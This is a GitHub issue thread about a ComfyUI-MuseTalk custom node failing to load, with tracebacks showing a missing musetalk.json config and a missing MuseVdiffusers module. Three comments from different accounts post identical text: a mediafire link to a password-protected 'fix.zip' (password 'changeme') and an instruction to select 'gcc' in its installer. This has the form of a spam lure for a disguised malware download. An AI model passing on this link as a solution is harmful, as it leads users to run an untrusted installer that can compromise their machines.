### ISSUE TITLE
FileNotFoundError: [Errno 2] No such file or directory: 

### ISSUE THREAD

**Issue by lindongyue7** [chaojie/ComfyUI-MuseTalk#32]
C:\Users\PC\miniconda3\Lib\site-packages\pydub\utils.py:170: RuntimeWarning: Couldn't find ffmpeg or avconv - defaulting to ffmpeg, but may not work
  warn("Couldn't find ffmpeg or avconv - defaulting to ffmpeg, but may not work", RuntimeWarning)
An error occurred while trying to fetch D:\comfyui\ComfyUI\models\diffusers\TMElyralab/MuseTalk/sd-vae-ft-mse/: Error no file named diffusion_pytorch_model.safetensors found in directory D:\comfyui\ComfyUI\models\diffusers\TMElyralab/MuseTalk/sd-vae-ft-mse/.
Defaulting to unsafe serialization. Pass `allow_pickle=False` to raise an error instead.
Traceback (most recent call last):
  File "D:\comfyui\ComfyUI\nodes.py", line 1993, in load_custom_node
    module_spec.loader.exec_module(module)
  File "<frozen importlib._bootstrap_external>", line 995, in exec_module
  File "<frozen importlib._bootstrap>", line 488, in _call_with_frames_removed
  File "D:\comfyui\ComfyUI\custom_nodes\ComfyUI-MuseTalk\__init__.py", line 1, in <module>
    from .nodes import NODE_CLASS_MAPPINGS
  File "D:\comfyui\ComfyUI\custom_nodes\ComfyUI-MuseTalk\nodes.py", line 34, in <module>
    audio_processor,vae,unet,pe  = load_all_model()
                                   ^^^^^^^^^^^^^^^^
  File "D:\comfyui\ComfyUI/custom_nodes/ComfyUI-MuseTalk\musetalk\utils\utils.py", line 29, in load_all_model
    unet = UNet(unet_config=f"{MuseVCheckPointDir}/musetalk/musetalk.json",
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "D:\comfyui\ComfyUI/custom_nodes/ComfyUI-MuseTalk\musetalk\models\unet.py", line 35, in __init__
    with open(unet_config, 'r') as f:
         ^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: 'D:\\comfyui\\ComfyUI\\models\\diffusers\\TMElyralab/MuseTalk/musetalk/musetalk.json'

Cannot import D:\comfyui\ComfyUI\custom_nodes\ComfyUI-MuseTalk module for custom nodes: [Errno 2] No such file or directory: 'D:\\comfyui\\ComfyUI\\models\\diffusers\\TMElyralab/MuseTalk/musetalk/musetalk.json'
['D:\\comfyui\\ComfyUI/custom_nodes/ComfyUI-MuseV/controlnet_aux/src', 'D:\\comfyui\\ComfyUI/custom_nodes/ComfyUI-MuseV/diffusers/src', 'D:\\comfyui\\ComfyUI/custom_nodes/ComfyUI-MuseV/MMCM', 'D:\\comfyui\\ComfyUI/custom_nodes/ComfyUI-MuseV', 'D:\\comfyui\\ComfyUI/custom_nodes/ComfyUI-MuseTalk', 'D:\\comfyui\\ComfyUI\\custom_nodes\\comfyui-mixlab-nodes\\nodes', 'D:\\comfyui\\ComfyUI\\custom_nodes\\ComfyUI-Frame-Interpolation', 'D:\\comfyui\\ComfyUI\\custom_nodes\\ComfyUI-Custom-Scripts-main', 'D:\\comfyui\\ComfyUI\\custom_nodes\\ComfyUI-Custom-Scripts', 'D:\\comfyui\\ComfyUI\\custom_nodes\\ComfyUI-BiRefNet-ZHO', 'D:\\comfyui\\ComfyUI\\comfy', 'D:\\comfyui\\ComfyUI', 'C:\\Users\\PC\\miniconda3\\python312.zip', 'C:\\Users\\PC\\miniconda3\\DLLs', 'C:\\Users\\PC\\miniconda3\\Lib', 'C:\\Users\\PC\\miniconda3', 'C:\\Users\\PC\\AppData\\Roaming\\Python\\Python312\\site-packages', 'C:\\Users\\PC\\miniconda3\\Lib\\site-packages', 'C:\\Users\\PC\\miniconda3\\Lib\\site-packages\\win32', 'C:\\Users\\PC\\miniconda3\\Lib\\site-packages\\win32\\lib', 'C:\\Users\\PC\\miniconda3\\Lib\\site-packages\\Pythonwin', 'D:\\comfyui\\ComfyUI\\custom_nodes\\ComfyUI-Manager\\glob', 'D:\\comfyui\\ComfyUI', 'D:\\comfyui\\ComfyUI', 'C:\\Users\\PC\\miniconda3\\Lib\\site-packages\\setuptools\\_vendor', 'D:\\comfyui\\ComfyUI\\custom_nodes\\ComfyUI-Impact-Pack\\modules', 'D:\\comfyui\\ComfyUI\\custom_nodes\\ComfyUI-Impact-Pack\\impact_subpack', 'C:\\Users\\PC\\miniconda3\\Lib\\site-packages\\transparent_background', 'C:\\Users\\PC\\miniconda3\\Lib\\site-packages\\transparent_background', 'D:\\comfyui\\ComfyUI\\custom_nodes\\ComfyUI-Manager\\glob', '../..', 'D:\\comfyui\\ComfyUI\\custom_nodes\\ComfyUI-MuseTalk\\musetalk/utils']       
Traceback (most recent call last):
  File "D:\comfyui\ComfyUI\nodes.py", line 1993, in load_custom_node
    module_spec.loader.exec_module(module)
  File "<frozen importlib._bootstrap_external>", line 995, in exec_module
  File "<frozen importlib._bootstrap>", line 488, in _call_with_frames_removed
  File "D:\comfyui\ComfyUI\custom_nodes\ComfyUI-MuseV-main\__init__.py", line 1, in <module>
    from .nodes import NODE_CLASS_MAPPINGS
  File "D:\comfyui\ComfyUI\custom_nodes\ComfyUI-MuseV-main\nodes.py", line 33, in <module>
    from MuseVdiffusers.models.autoencoder_kl import AutoencoderKL
ModuleNotFoundError: No module named 'MuseVdiffusers'

Cannot import D:\comfyui\ComfyUI\custom_nodes\ComfyUI-MuseV-main module for custom nodes: No module named 'MuseVdiffusers'

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LYLQJZC** [comment]
前一天还能用的py文件，第二天使用就出现FileNotFoundError: [Errno 2] No such file or directory。路径和文件都没进行改动
